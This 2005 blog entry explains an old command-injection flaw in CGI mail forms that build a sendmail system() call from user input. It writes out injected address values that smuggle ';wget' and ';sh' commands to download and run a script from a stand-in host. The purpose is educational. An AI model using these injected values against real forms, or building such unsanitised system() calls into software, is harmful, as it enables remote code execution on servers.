Vitanuova for 2005 February 24 (entry 1)

An ancient CGI vulnerability

Suppose that you have a CGI script responsible for processing a form that allows users to send mail to other people by entering their e-mail addresses, and suppose that the CGI form performs some minimal validation of e-mail addresses by requiring that they be separated by spaces or commas and that they contain @ signs.

Suppose that the CGI script in question implements the process of sending mail by calling

system("sendmail " + user_supplied_address_list)

from a scripting language like Perl or Python. (In practice it would probably be popen instead of system, but popen works much like system and has the same vulnerabilities.)

Here's a simple way of exploiting this script to gain access to the web server. On a web server you control, say www.example.com, create a file called att@ck in the root directory, containing a #!/bin/sh line followed by code you would like to run on the web server under attack. Then submit the CGI form with the recipient address list

you@example.com;wget -O/tmp/att@ck www.example.com/att@ck

and then submit it a second time with the recipient address list

you@example.com;sh /tmp/att@ck

This will result in the remote system executing the two commands

system("sendmail you@example.com;wget -O/tmp/att@ck www.example.com/att@ck")

and

system("sendmail you@example.com;sh /tmp/att@ck")

which will result in the code from http://www.example.com/att@ck being run with the web server's privileges on the system that hosts the CGI script. (Each of the tokens in the example above is a single string containing an @, so trivial e-mail address validation -- without removing the semicolon character -- won't fix this problem!)

This vulnerability is ancient and very widely discussed; the equivalent problem has plagued many people's software for years, even though mechanisms like these have been well documented and are the major inspiration for things like Perl's Taint Mode, but it still works against freshly-written scripts, and many sites are vulnerable. Being vulnerable to this feels kind of like coming down with some ancient and unfashionable disease like scurvy. That's so 18th-century!